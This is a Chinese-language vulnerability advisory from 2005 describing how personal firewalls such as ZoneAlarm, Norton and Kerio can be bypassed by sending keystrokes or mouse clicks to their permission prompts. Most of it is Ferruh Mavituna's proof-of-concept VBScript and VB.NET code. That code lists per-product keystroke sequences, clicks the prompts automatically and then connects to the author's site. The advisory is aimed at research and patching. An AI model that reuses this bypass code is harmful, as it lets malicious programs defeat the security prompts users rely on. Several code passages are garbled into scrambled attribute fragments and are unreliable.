发布日期:2005-01-03
更新日期:2005-01-04
受影响系统:
Zone Labs ZoneAlarm Pro 4.5.538.001
Zone Labs ZoneAlarm Pro 4.5
Symantec Norton Personal Firewall 2004
Symantec Norton Personal Firewall 2003
Symantec Norton Personal Firewall 2002
Kerio Personal Firewall 4.1.2
Kerio Personal Firewall 4.1.1
Kerio Personal Firewall 4.1.0
描述:
--------------------------------------------------------------------------------
多数个人防火墙允许快捷方式或者接口控制通信。
多数个人防火墙访问实现控制存在问题,远程攻击者可以利用这个漏洞可以通过控制鼠标或者发送快捷方式来绕过防火墙控制,完全访问系统。
攻击者可以设置一个VBScript脚本,此脚本执行一个多线程的自身的实例并当第一个实例连接到Internet时发送快捷方式给防火墙,可导致控制防火墙行为,绕过控制。
另外也可以通过鼠标控件来绕过,程序没有使用一个实际的多先程,因为部分防火墙会直接打断程序执行,因此程序使用一个参数执行另一个自身的实例来实现,绕过防火墙控制。
利用这个问题,可导致木马等恶意程序进行SERVER监听或者直接访问防火墙而不被防火墙提示。
<*来源:Ferruh Mavituna ([email protected])
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110478641332370&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Ferruh Mavituna ([email protected])提供了如下测试方法:
'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
'Modified for Agnitium Outpost Firewall 2.1.303.4009 (314)
'Tested : Agnitium Outpost Firewall 2.5.369.4608 (369)
'5/5/2004
'02.01.2005
'Ferruh Mavituna
'Const DELAY = 1000
'Const TIMES = 1
'Const EXTRADELAY = 0
'***********************************************************
Option Explicit
Dim argLen, shell, sendKeyMod, i, appName
Const DELAY = 1000
Const TIMES = 1
Const EXTRADELAY = 0
appName = Wscript.ScriptName
'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True
Set shell = WScript.CreateObject("WScript.Shell")
If sendKeyMod Then
'First Sleep for a while
If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY
'Force
While i
1<times !="" !"="" "="" ""="" "+{tab}"="" "exit="" "head",="" "mission="" "{enter}"="" "{up="" &="" '="" '***********************************************************="" '----------------------------------------------="" '1)="" '3="" '5="" '6="" 'added="" 'agnitium="" 'auto="" 'connect="" 'define="" 'enter="" 'exit="" 'go="" 'history="" 'kaspersky="" 'kerio="" 'select="" 'sendkey="" 'todo:read="" 'wscript.echo="" 'zonealarm="" (314)="" (tested="" (text="" 1="" 1.5.119.0="" 2.1.303.4009="" 2003="" 2004="" 25="" 2}"="" 4="" 4.0.14="" 4.5.530="" 5="" :="" ["anti-hacker.txt"="" accomplished..."="" active="" add="" advisory="" and="" anti-hacker="" appname="Wscript.ScriptName" arglen="" arglen,="" arrdelays(5,2),="" arrdelays(kaspersky,0)="1000" arrdelays(kaspersky,1)="1" arrkeys(5,5),="" arrkeys(kaspersky,0)="{ENTER}" arrregistry(5,1),intfirewall="" back="" by="" bypassing="" call="" configuration="" connect="web.getAllResponseHeaders" connect("http:="" connect(byval="" const="" current="" date="" delay="" delays="" determine="" determinefirewall="" dim="" end="" enter="" explicit="" extradelay="0" false="" ferruh="" ferruh.mavituna.com="" ferruh.mavituna.com")="" ferruh{@}mavituna.com,="" firewall="" firewalls="" first="" for="" function="" http:="" i="i+1" i,="" if="" intfirewall="Kaspersky" it="" j,="" kaspersky="3" kerio="1" kerio,="" keys="" mavituna="" multiple="" not="" once="" option="" outpost="2" plain)]="" poc="" press="" pro,="" products="" published="" registries="" related="" send")="" sendkeymod="False" sendkeymod,="" set="" shell="Nothing" shell,="" shell.run(appname="" shell.sendkeys="" simple="" then="" times="" trusted="" up="" url)="" url,="" web="Nothing" web.open="" web.send="" wend="" windows="" winxp)="" wscript.echo="" wscript.quit="" wscript.scriptfullname="" wscript.sleep="" yet="" za="" zonealarm="0">0 Then sendkeyMod = True
2
3Set shell = WScript.CreateObject("WScript.Shell")
4
5If sendKeyMod Then
6
7'First Sleep for a while
8If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY
9
10'Force
11While i<arrdelays(intfirewall,1) 'send="" arrdelays(intfirewall,0)="" arrkeys(intfirewall,j)<="" for="" i="i+1" if="" j="0" keys="" to="" ubound(arrkeys,2)="" wscript.sleep="">"" Then
12shell.sendKeys arrKeys(intFirewall,j)
13End If
14Next
15
16Wend
17
18'Exit
19'Wscript.Echo "Exit !"
20Wscript.Quit 1
21End If
22
23'Wscript.Echo WScript.ScriptFullName
24Call shell.Run(appName & " /send")
25
26'Connect
27Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."
28
29Set shell = Nothing
30Wscript.Quit 1
31
32
33Function connect(ByVal URL)
34Dim web
35Set web = CreateObject("Microsoft.XmlHttp")
36web.open "HEAD", URL, FALSE
37web.send ""
38connect = web.getAllResponseHeaders
39Set web = Nothing
40End Function
41["ZoneAlarm.txt" (text/plain)]
42
43'***********************************************************
44'// By Ferruh Mavituna
45'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
46'***********************************************************
47'// Date : 4/25/2004
48'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
49'// Related Advisory : NOT PUBLISHED YET
50'***********************************************************
51Option Explicit
52
53Dim argLen, shell, sendKeyMod, i
54Const DELAY = 10
55Const TIMES = 15
56
57'SendKey
58sendkeyMod = False
59argLen = WScript.Arguments.Length
60If argLen>0 Then sendkeyMod = True
61
62Set shell = WScript.CreateObject("WScript.Shell")
63
64If sendKeyMod Then
65While i<times !="" !"="" "="" ""="" "%r"="" "%y"="" "exit="" "head",="" "mission="" "now="" "ok,="" &="" '="" '***********************************************************="" 'click="" 'connect="" 'exit="" 'remember,="" 'wscript.echo="" (text="" 1="" 2004="" 25="" 4="" :="" ["testfirewall.txt"="" access="" accomplished..."="" accomplished...,="" advisory="" again="" alarm="" and="" ask="" by="" byref="" call="" connect="True" connect("http:="" connect(byval="" connect(url,result)="" const="" couldn't="" date="" delay="" dim="" do="" else="" end="" err.clear="" err<="" error="" explicit="" false="" ferruh="" ferruh.mavituna.com="" ferruh.mavituna.com")="" ferruh{@}mavituna.com,="" file="" firewall="" for="" function="" headers;"="" here="" http:="" i="" i'll="" if="" internet"="" is="" mavituna="" multithreading="" next="" not="" on="" option="" plain)]="" poc="" published="" related="" result="web.getAllResponseHeaders" result)="" resume="" send")="" sendkeymod,="" sendkeys="" set="" shell="Nothing" shell,="" shell.run("skipza.vbs="" shell.sendkeys="" simple="" skipping="" test="" the="" then="" to="" try="" url="" url)="" url,="" vbnewline="" web="Nothing" web.open="" web.send="" wend="" with="" wscript.echo="" wscript.quit="" wscript.scriptfullname="" wscript.sleep="" yes="" yet="" zone="">0 Then connect = False
66End Function
67["norton.txt" (text/plain)]
68
69'***********************************************************
70'// By Ferruh Mavituna
71'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
72'***********************************************************
73'// Date : 4/25/2004
74'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
75'// Related Advisory : NOT PUBLISHED YET
76'***********************************************************
77Option Explicit
78
79Dim argLen, shell, sendKeyMod, i
80Const DELAY = 10
81Const TIMES = 15
82
83'SendKey
84sendkeyMod = False
85argLen = WScript.Arguments.Length
86If argLen>0 Then sendkeyMod = True
87
88Set shell = WScript.CreateObject("WScript.Shell")
89
90If sendKeyMod Then
91While i<times !="" !"="" ""="" "%a"="" "%o"="" "exit="" "head",="" "kernel32"="" "mission="" "user32"="" &="" '="" '***********************************************************="" 'args="" 'as="" 'click="" 'connect="" 'customized="" 'debug="" 'exit="" 'firewalls="" 'get="" 'hide="" 'remember,="" 'set="" 'this="" 'wscript.echo="" 'x="" 'y="" (byval="" (text="" -="" 0)="screenX" 1="" 1)="screenY" 130="" 19="" 190="" 2)="screenX" 2004="" 250="" 3)="screenY" 5="" 93="" :="" ["mousecontrol.txt"="" \="" a="" about="" accomplished..."="" activefirewall="" again="" app="" arrfirewalls(1,="" arrfirewalls(zonealarm,="" as="" ask="" automaticly="" but="" by="" bypassing="" byval="" call="" car="" cbuttons="" change="" code="" connect="web.getAllResponseHeaders" connect("http:="" connect(byval="" const="" current="" date="" declare="" delay="" detect="" dim="" do="" dwextrainfo="" dwflags="" dwmilliseconds="" dx="" dy="" e="" easy="" end="" environment.getcommandlineargs().length="" etc.="" exact="" example="" false="" ferruh="" ferruh.mavituna.com="" ferruh.mavituna.com")="" ferruh{@}mavituna.com,="" firewall="" firewall,="" flagarg="" for="" frmfirewalltest_load(byval="" function="" fw="" handles="" http:="" i="i+1" if="" installed="" integer="\" is="" it's="" just="" lib="" long)="" long,="" mavituna="" me.showintaskbar="False" me.visible="False" mouse_event="" mouseeventf_leftdown="&H2" mouseeventf_leftup="&H4" mouseeventf_middledown="&H20" mouseeventf_middleup="&H40" mouseeventf_rightdown="&H8" mouseeventf_rightup="&H10" multiple="" mybase.load="" norton="" not="" oezguer="" plain)]="" poc="" poc,="" points="" position="" positoin,="" private="" products="" real="" remember="" screen="" screen.primaryscreen.bounds.height="" screen.primaryscreen.bounds.width="" screenx="" screeny="" second="" send")="" sender="" set="" setupfirewalls()="" shell="Nothing" shell.run("skipza.vbs="" shell.sendkeys="" should="" simple="" sleep="" sleeptime="0.5" slowmotion="True" string="Application.ExecutablePath" sub="" system.eventargs)="" system.object,="" taskbar="" times,="" to="" url)="" url,="" vb.net="" web="Nothing" web.open="" web.send="" wend="" world="" write="" wscript.echo="" wscript.quit="" wscript.scriptfullname="" wscript.sleep="" yes="" zonealarm=""> 1 Then
92
93'Sleep;
94Sleep(sleepTime * 1000)
95
96'Try;
97setupFirewalls()
98
99If slowMotion Then Sleep(1000)
100
101'First Access
102bypassFirewall(arrFirewalls(activeFirewall, 0), arrFirewalls(activeFirewall, 1))
103
104If slowMotion Then Sleep(1000)
105bypassFirewall(arrFirewalls(activeFirewall, 2), arrFirewalls(activeFirewall, 3))
106
107'Gain Access for HTTP
108Sleep(300)
109
110If slowMotion Then Sleep(1000)
111bypassFirewall(arrFirewalls(activeFirewall, 0), arrFirewalls(activeFirewall, 1))
112
113If slowMotion Then Sleep(1000)
114bypassFirewall(arrFirewalls(activeFirewall, 2), arrFirewalls(activeFirewall, 3))
115
116'Quit !
117Me.Dispose()
118Else
119
120System.Diagnostics.Process.Start(flagArg, "skipme")
121
122'Access Internet
123If downloadURL() Then
124MessageBox.Show("Successed !, Firewall ByPassed !", "Firewall ByPassed !", \
125MessageBoxButtons.OK, MessageBoxIcon.Warning)
126
127End If
128
129Me.Dispose()
130End If
131
132End Sub
133
134
135'Bypas POC
136Private Sub bypassFirewall(ByVal X As Integer, ByVal Y As Integer)
137'Save Old Positions for return !
138Dim oldX As Integer = Cursor.Position.X
139Dim oldY As Integer = Cursor.Position.Y
140
141'Set New Position
142Cursor.Position = New Point(X, Y)
143
144'Click
145mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
146mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)
147
148'Return
149Cursor.Position = New Point(oldX, oldY)
150
151End Sub
152
153'Connect Internet
154Private Function downloadURL() As Boolean
155downloadURL = True
156Try
157Dim wc As New System.Net.WebClient()
158wc.DownloadFile("http://ferruh.mavituna.com", "C:\firewalltest.htm")
159Catch
160MessageBox.Show("Can not connected !", "Not Connected !", MessageBoxButtons.OK, \
161MessageBoxIcon.Error) downloadURL = False
162End Try
163End Function
164
165
166["bypassSendKey.txt" (text/plain)]
167
168'***********************************************************
169'// By Ferruh Mavituna
170'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
171'***********************************************************
172'// Date : 4/25/2004
173'// Simple POC for Bypassing multiple firewall products
174'***********************************************************
175'HISTORY
176'3/5/2004
177'Added ZA
178
179'5/5/2004
180'Added Kerio, Outpost
181
182'6/5/2004
183'Added Kaspersky Anti-Hacker
184
185'5/9/2004
186'LooknStop
187
188'5/20/2004
189'Norton
190'***********************************************************
191
192Option Explicit
193
194Dim arrKeys(5,5), arrDelays(5,2), arrRegistry(5,1),intFirewall
195Const EXTRADELAY = 0
196Const DETERMINEFIREWALL = FALSE 'Auto Determine current Firewall
197
198'----------------------------------------------
199'Define Delays and Times for Firewalls
200'----------------------------------------------
201'// Firewalls
202'ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP) | www.zonelabs.com
203Const ZoneAlarm = 0
204
205'Kerio 4.0.14
206Const Kerio = 1
207
208'Agnitium Outpost Firewall 2.1.303.4009 (314) | www.agnitium.com
209Const Outpost = 2
210
211'Kaspersky Anti-Hacker 1.5.119.0 | www.kaspersky.com
212Const Kaspersky = 3
213
214'Look 'n' Stop 2.04p2 | www.looknstop.com
215Const LooknStop = 4
216
217'Norton | www.norton.com
218Const Norton = 5
219
220'Select Active Firewall
221intFirewall = ZoneAlarm
222
223
224'// Configuration
225'Define Keys, Delays, Repeat Times for Firewalls
226
227'Kaspersky Anti-Hacker
228arrDelays(Kaspersky,0) = 400
229arrDelays(Kaspersky,1) = 2
230
231arrKeys(Kaspersky,0) = "{ENTER}" 'Just say OK
232
233'ZoneAlarm
234arrDelays(ZoneAlarm,0) = 10
235arrDelays(ZoneAlarm,1) = 15
236
237arrKeys(ZoneAlarm,0) = "%R" 'Select Remember
238arrKeys(ZoneAlarm,1) = "%Y" 'Yes
239
240'Outpost
241arrDelays(Outpost,0) = 1000
242arrDelays(Outpost,1) = 1
243
244arrKeys(Outpost,0) = "+{TAB}" 'Go back once
245arrKeys(Outpost,1) = "{UP 2}" 'Go Up
246arrKeys(Outpost,1) = "{ENTER}" 'Enter
247
248'Kerio
249arrDelays(Kerio,0) = 100
250arrDelays(Kerio,1) = 10
251
252arrKeys(Kerio,0) = " " ' Space - Remember, Do not ask again !
253arrKeys(Kerio,1) = "%P" ' Yes
254
255'LookNStop
256arrDelays(LooknStop,0) = 1000
257arrDelays(LooknStop,1) = 1
258
259arrKeys(LooknStop,0) = "(%+{TAB})" ' Authorize
260arrKeys(LooknStop,1) = "{LEFT}" ' Left
261arrKeys(LooknStop, 2) = " " ' Space
262
263'Norton
264arrDelays(Norton,0) = 100
265arrDelays(Norton,1) = 5
266
267arrKeys(Norton,0) = "%A" ' Allow
268arrKeys(Norton,1) = "%O" ' OK
269
270
271If DETERMINEFIREWALL Then
272'TODO:Read Registries and determine it !
273End If
274
275Dim argLen, shell, sendKeyMod, i, j, appName
276appName = Wscript.ScriptName
277
278'SendKey
279sendkeyMod = False
280argLen = WScript.Arguments.Length
281If argLen>0 Then sendkeyMod = True
282
283Set shell = WScript.CreateObject("WScript.Shell")
284
285If sendKeyMod Then
286
287'First Sleep for a while
288If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY
289
290'Force
291While i<arrdelays(intfirewall,1) 'send="" arrdelays(intfirewall,0)="" arrkeys(intfirewall,j)<="" for="" i="i+1" if="" j="0" keys="" to="" ubound(arrkeys,2)="" wscript.sleep="">"" Then
292shell.sendKeys arrKeys(intFirewall,j)
293End If
294Next
295
296Wend
297
298'Exit
299'Wscript.Echo "Exit !"
300Wscript.Quit 1
301End If
302
303'Wscript.Echo WScript.ScriptFullName
304Call shell.Run(appName & " /send")
305
306'Connect
307Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."
308
309Set shell = Nothing
310Wscript.Quit 1
311
312
313Function connect(ByVal URL)
314Dim web
315Set web = CreateObject("Microsoft.XmlHttp")
316web.open "HEAD", URL, FALSE
317web.send ""
318connect = web.getAllResponseHeaders
319Set web = Nothing
320End Function
321["Kerio.txt" (text/plain)]
322
323'***********************************************************
324'// By Ferruh Mavituna
325'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
326'***********************************************************
327'// Date : 4/25/2004
328'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
329'// Related Advisory : NOT PUBLISHED YET
330'***********************************************************
331'Modified for Kerio 4.0.14
332'5/5/2004
333'Ferruh Mavituna
334'Const DELAY = 100
335'Const TIMES = 10
336'***********************************************************
337
338Option Explicit
339
340Dim argLen, shell, sendKeyMod, i, appName
341Const DELAY = 100
342Const TIMES = 10
343
344appName = Wscript.ScriptName
345
346'SendKey
347sendkeyMod = False
348argLen = WScript.Arguments.Length
349If argLen>0 Then sendkeyMod = True
350
351Set shell = WScript.CreateObject("WScript.Shell")
352
353If sendKeyMod Then
354While i<TIMES
355i=i+1
356WScript.Sleep DELAY
357shell.sendKeys " " 'Remember, Do not ask again !
358shell.sendKeys "%P" 'Click Yes
359Wend
360
361'Exit
362'Wscript.Echo "Exit !"
363Wscript.Quit 1
364End If
365
366'Wscript.Echo WScript.ScriptFullName
367Call shell.Run(appName & " /send")
368
369'Connect
370Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."
371
372Set shell = Nothing
373Wscript.Quit 1
374
375
376Function connect(ByVal URL)
377Dim web
378Set web = CreateObject("Microsoft.XmlHttp")
379web.open "HEAD", URL, FALSE
380web.send ""
381connect = web.getAllResponseHeaders
382Set web = Nothing
383End Function
384
385建议:
386\--------------------------------------------------------------------------------
387临时解决方法:
388
389如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
390
391* 所有允许的行为必须询问密码。
392
393厂商补丁:
394
395Zone Labs
396\---------
397ZoneLabs Team已经提供最新版本修正此漏洞:
398
399http://www.zonelabs.com/</arrdelays(intfirewall,1)></times></times></arrdelays(intfirewall,1)></times>